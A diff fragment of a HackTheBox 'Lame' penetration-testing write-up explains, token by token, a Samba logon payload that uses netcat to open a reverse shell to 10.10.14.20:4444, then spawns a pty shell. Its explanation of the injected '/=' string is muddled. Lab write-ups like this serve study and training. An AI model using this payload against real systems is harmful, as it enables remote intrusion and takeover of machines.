Binary0101Devil/Network-Penetration-Testing/OSCP/Machines/HTB/Lame/README.md

 logon "/=`nohup nc -nv 10.10.14.20 4444 -e /bin/sh`"
 ```

-logon ---->>>> is likely the name of a function or command that is being called.
+logon ---->>>> is likely the name of a function or command that is being called. <br>
-"/=" ---->>>> is not a valid shell syntax and it's not clear what the intention of this string is.
+"/=" ---->>>> is not a valid shell syntax and it's not clear what the intention of this string is. <br>
-nohup ---->>>>  is a command that allows a process to continue running in the background even if the user logs out or the terminal is closed.
+nohup ---->>>>  is a command that allows a process to continue running in the background even if the user logs out or the terminal is closed. <br>
--nc ---->>>>  is the netcat command, which is a utility for reading and writing data across network connections.
+-nc ---->>>>  is the netcat command, which is a utility for reading and writing data across network connections. <br>
--nv ---->>>> are options for nc, which instruct it to use verbose output and to not use DNS for resolving the target IP address.
+-nv ---->>>> are options for nc, which instruct it to use verbose output and to not use DNS for resolving the target IP address. <br>
--e ---->>>>  is an option for nc that specifies the command to execute after the connection is established.
+-e ---->>>>  is an option for nc that specifies the command to execute after the connection is established. <br>
 /bin/sh ---->>>>  is the command that will be executed on the target machine after the reverse shell connection is established.
-It launches a shell session, allowing the attacker to interact with the target machine's command line.
+It launches a shell session, allowing the attacker to interact with the target machine's command line. <br>

 ```
 python3 -c 'import pty;pty.spawn("/bin/bash")'